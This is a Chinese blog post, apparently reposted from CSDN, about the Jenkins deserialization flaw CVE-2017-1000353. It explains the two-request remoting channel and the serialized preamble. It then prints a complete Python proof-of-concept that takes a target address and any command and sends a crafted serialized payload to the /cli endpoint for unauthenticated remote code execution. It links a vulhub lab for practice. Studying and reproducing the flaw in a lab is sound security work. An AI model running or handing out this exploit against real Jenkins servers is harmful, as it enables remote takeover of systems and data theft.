jenkins 反序列化漏洞 cve-2017-1000353

最新推荐文章于 2024-07-05 10:55:09 发布
最新推荐文章于 2024-07-05 10:55:09 发布
阅读量1.4k 收藏
点赞数 1
原文链接:https://blog.csdn.net/whatday/article/details/106737499
版权

一、漏洞原理:

首先这是一个java反序列化漏洞,一定是command在序列化信息中,反序列化时候直接执行了该命令。

攻击过程学习:

下文的session是一个uuid,类型4

# 可以如下生成
session = uuid.uuid4()

1、首先要发送一个请求,是一个下载请求。这个请求是要启动一个双向数据传输频道。频道的标识就是session。而side字段则是用来标识传输方向

对应代码段:

def Download(url,session):
    headers = {'Side':'download'}
    headers['Content-type'] = 'application/x-www-form-urlencoded'
    headers['Session'] = session
    headers['Transfer-Encoding'] = 'chunked'
    try:
        response = requests.post(url,data=Null_Payload(),headers=headers,proxies=Proxy,stream=True)
    except Exception,ex:
        print ex
        exit(0)
    print response.content

然后是第二个请求:双向信道发送组件,第一个请求被阻塞,一直到第二个请求被发送。此时session与之前保持一致,side改成upload。

数据部分格式规范如下:

(1)前导码

前导码包含一个base64编码的序列化对象。“ 能力 ” 类型的序列化对象只是告诉服务器
客户端具有哪些能力(例如HTTP 分块编码)。

Premle='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='

(2)Proto部分 (可能是所说的额外字节)

Proto = 'x00x00x00x00'

(3)payload部分

在前导码和一些额外的字节之后,Jenkins服务器期望类型为Command的序列化对象。由于Jenkins不验证序列化对象,所以可以发送任何序列化对象。

def Payload_Init(command):
    global File_Serialization
    command = "java -jar jenkins_payload.jar payload.ser '%s'"%str(command)
    print command
    return_number = os.system(command)
    if return_number != 0:
        print "Call Jar Packet To Init The Payload Error"
        exit(0)
    File_Serialization = open("./payload.ser","rb").read()

所有第二个数据包发送的数据整合:

def Create_Payload_Chunked():
    yield Premle
    yield Proto
    yield File_Serialization

发送第二个数据包:

def Upload_Chunked(url,session,data):
    headers = {'Side':'upload'}
    headers['Session'] = session
    headers['Content-type'] = 'application/octet-stream'
    headers['Accept-Encoding'] = None
    headers['Transfer-Encoding'] = 'chunked'
    headers['Cache-Control'] = 'no-cache'
    try:    
        response = requests.post(url,headers=headers,data=Create_Payload_Chunked(),proxies=Proxy)
    except Exception,ex:
        print ex
        exit(0)

整个攻击流程

def Attack():
    print "start"
    session = str(uuid.uuid4())
    thread_object = threading.Thread(target=Download,args=(Target,session))
    thread_object.start()
    time.sleep(1)
    print "pwn"
    #Upload(URL, session, create_payload())
    Upload_Chunked(Target,session,"asdf")

服务器端对应处理

反序列化command对象

然后这个方法在这里被调用

返回了这个序列化好的对象cmd

read方法调用,把返回的对象赋值给了cmd,也就是被读进一个ReaderThread类型的线程。

该线程由类“ CliEndpointResponse ”中调用的“ upload ”方法触发。

在该方法中,HTTP主体数据被读取,并且调用“notify”方法来通知线程。

整体POC

import os
import uuid
import gzip
import zlib
import time
import urllib
import socket
import urllib3
import requests
import threading
from optparse import OptionParser

#全局变量定义:
#Proxy = {"http":"http://127.0.0.1:8090","https":"http://127.0.0.1:8090"}#HTTP、HTTPS协议代理设置
Proxy = None#HTTP、HTTPS协议代理设置
Target="http://%s:8080/cli"#攻击目标
Premle='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
Proto = 'x00x00x00x00'
File_Serialization = None
socket.setdefaulttimeout(3)


#全局函数定义
def Payload_Init(command):
    global File_Serialization
    command = "java -jar jenkins_payload.jar payload.ser '%s'"%str(command)
    print command
    return_number = os.system(command)
    if return_number != 0:
        print "Call Jar Packet To Init The Payload Error"
        exit(0)
    File_Serialization = open("./payload.ser","rb").read()

def Download(url,session):
    headers = {'Side':'download'}
    headers['Content-type'] = 'application/x-www-form-urlencoded'
    headers['Session'] = session
    headers['Transfer-Encoding'] = 'chunked'
    try:
        response = requests.post(url,data=Null_Payload(),headers=headers,proxies=Proxy,stream=True)
    except Exception,ex:
        print ex
        exit(0)
    print response.content

'''
def Upload(url,session,data):
    headers = {'Side':'upload'}
    headers['Session'] = session
    headers['Content-type'] = 'application/octet-stream'
    headers['Accept-Encoding'] = None
    try:
        response = requests.post(url,data=data,headers=headers,proxies=Proxy)
    except Exception,ex:
        print ex
        exit(0)
'''

def Upload_Chunked(url,session,data):
    headers = {'Side':'upload'}
    headers['Session'] = session
    headers['Content-type'] = 'application/octet-stream'
    headers['Accept-Encoding'] = None
    headers['Transfer-Encoding'] = 'chunked'
    headers['Cache-Control'] = 'no-cache'
    try:
        response = requests.post(url,headers=headers,data=Create_Payload_Chunked(),proxies=Proxy)
    except Exception,ex:
        print ex
        exit(0)

def Null_Payload():
    yield " "

"""
def Create_Payload():
    payload = Premle + Proto + File_Serialization
    return payload

"""

def Create_Payload_Chunked():
    yield Premle
    yield Proto
    yield File_Serialization

def Attack():
    print "start"
    session = str(uuid.uuid4())
    thread_object = threading.Thread(target=Download,args=(Target,session))
    thread_object.start()
    time.sleep(1)
    print "pwn"
    #Upload(URL, session, create_payload())
    Upload_Chunked(Target,session,"asdf")

#程序入口
if __name__ == "__main__":
    parser = OptionParser()
    parser.add_option("-t","--target",dest="target",help="Target IP address!")
    parser.add_option("-c","--command",dest="command",help="The command to execute!")
    parser.add_option("-p","--protocol",dest="protocol",help="Protocl is HTTP or HTTPS!")
    (options, args) = parser.parse_args()
    optionslist = [options.target,options.command,options.protocol]
    if None in optionslist or "" in optionslist:
        print "Please check your input parameters!"
    Target = Target%options.target
    command = options.command
    protocol = options.protocol
    if protocol == "HTTP":
        pass
    elif protocol == "HTTPS":
        Target = Target.replace("http","https")
    else:
        print "Unknown Protocol!"
    Payload_Init(command)
    Attack()

靶机平台:

https://vulhub.org/#/environments/jenkins/CVE-2017-1000353/

poc:

https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py

 

 

whatday
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jenkins java反序列化_Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)
weixin_31308407的博客
02-13 201
Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)一、漏洞描述该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。二、漏洞影响版本所有jenkins主版本均受到影响(包括<=2.56版本)所有的jenkins LTS均受到影响(包括&lt...
Jenkins反序列化漏洞cve-2017-1000353
weixin_30593443的博客
12-13 420
一、漏洞原理: 本地没有环境:参考:https://blogs.securiteam.com/index.php/archives/3171 进行学习理解记录。 首先这是一个java反序列化漏洞,一定是command在序列化信息中,反序列化时候直接执行了该命令。 攻击过程学习: 下文的session是一个uuid,类型4 1 #可以如下生成 2 session = uuid....
Jenkins-CI 远程代码执行漏洞复现(CVE-2017-1000353
最新发布
m0_63082628的博客
07-05 811
Jenkins-CI 远程代码执行漏洞复现
Jenkins-CI 远程代码执行漏洞CVE-2017-1000353
黑白的博客
12-07 1462
声明 好好学习,天天向上 漏洞描述 该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中。Jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。 影响范围 所有Jenkins主版本均受到影响(包括<=2.56版本) 所有Jenkins LTS 均受到影响( 包括<=2.46.1版本) 复现过程 这里使用2.46.1版本 使用vulhub cd /app/vulhub-master/jenkins/CVE-2017-1000353/
Jenkins远程代码执行漏洞检查(CVE-2017-1000353
weixin_30675247的博客
05-05 235
Jenkins反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限 漏洞影响范围: 所有Jenkins主版本均受到影响(包括<=2.56版本)所有Jenkins LTS 均受到影响( 包括<=2.46.1版本) 测试步骤: 1.下载生成反序列的payload: https://github.com/nobleXu/jenkins 2.生成...
jenkins java反序列化_Jenkins “Java 反序列化”过程远程命令执行漏洞
weixin_42565755的博客
02-13 255
###漏洞原理反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例化操作用于恢复之前序列化时的对象。在原博文所提到的那些 Java 应用里都有特定的接口用于传递序列化对象数据,而在反序列化时并没有限制实例化对象的类型,导致可以任意构造应用中已经包含的对象利用反序列化操作进行实例化。Java 在进行反序列化操作的时候会使用 Objec...
JAVA反序列化漏洞知识点整理
01-20
jenkins反序列漏洞跟过一遍之后,虽说梳理清楚了漏洞触发的大体流程,但是对于JAVA反序列化漏洞导致代码执行的原理仍旧不懂,因此有必要整理JAVA反序列化漏洞相关的知识点。  JAVA反序列化漏洞  反序列化漏洞的...
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
PoC:Jenkins RCE SECURITY-1266 / CVE-2019-... 更新: 的文章解释了利用CVE-2018-1000861和CVE-2019-1003000的漏洞利用链,绕过了对预身份验证RCE的总体/读取权限的需求: : 安装 $ git clone https://github.co
Jenkins自动化部署-----持续交付
01-27
感谢之前带领过我的leader,让我能够知道什么是好的开发方法。 在很早之前就接触过敏捷开发。什么是敏捷开发,简单来说就是让软件可靠地,快速地发布出来的一种开发方法和技巧。 而敏捷开发中有许多的实践,可能并...
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
Jenkins-PreAuth-RCE 漏洞详解】 Jenkins 是一款广泛应用的持续集成工具,用于自动化各种软件构建、测试和部署任务。在2019年,一个名为CVE-2019-1003000的安全漏洞被公开,允许未经身份验证的攻击者执行远程代码...
Jenkins远程代码执行漏洞CVE-2017-1000353
公众号shadow sock7
01-31 3070
复现环境: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353 复现 使用Intellij Idea打包java为可执行jar包参考: https://blog.csdn.net/xuemengrui12/article/details/74984731 ...
[漏洞复现]vulfocus/jenkins-cve_2017_1000353
qq_45751902的博客
11-24 553
Jenkins反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限建议自己搭建环境复现,这个vulfocus上没有体现出反序列化漏洞,因为无法使用反序列化查看flag,最终使用弱口令登录,执行系统命令成功找到flag。
Jenkins反序列化代码执行
xmas
05-10 1484
# -*- encoding:utf-8 -*- import socket import base64 import random import urllib2 import time import binascii def random_str(len): str1="" for i in range(len): str1+=(random.choice(
漏洞复现】Jenkins-CI远程代码执行漏洞(CVE-2017-1000353
weixin_43486390的博客
12-18 886
0x01 漏洞描述 Jenkins存在未经身份验证的远程代码执行漏洞,经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。远程攻击者可利用漏洞在受影响的应用程序的上下文中执行任意代码,或造成程序拒绝服务。 0x02 影响范围 所有Jenkins主版本均受到影响(包括<=2.56版本) 所有Jenkins LTS 均受到影响( 包括<=2.46.1
Jenkins CVE-2017-1000353远程代码执行漏洞复现
云舒的博客
09-09 977
Jenkins CVE-2017-1000353远程代码执行漏洞复现
Jenkins 远程代码执行漏洞CVE-2017-1000353) 复现
YouthBelief的博客
11-25 4985
所有文章,仅供安全研究与学习之用,后果自负! Jenkins 远程代码执行漏洞CVE-2017-1000353Jenkins 远程代码执行漏洞CVE-2017-1000353)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 Jenkins 远程代码执行漏洞CVE-2017-1000353) 0x01 漏洞描述 Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交
jenkins漏洞安全漏洞CVE-2022-2048和CVE-2021-28169
05-20
CVE-2022-2048是Jenkins中的一个安全漏洞,存在于Jenkins的SSH插件中。攻击者可以利用该漏洞通过SSH连接到Jenkins主机并执行任意命令。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 CVE-2021-28169是Jenkins中的另一个安全漏洞,存在于Jenkins的Windows安装程序中。攻击者可以利用该漏洞Jenkins服务器上执行任意代码,甚至获取管理员权限。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 为了防止这些漏洞的利用,建议及时更新Jenkins软件,尽可能使用最新版本,并遵循最佳的安全实践。此外,也可以采取其他措施,如限制Jenkins服务器的网络访问权限,使用防火墙保护服务器等等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值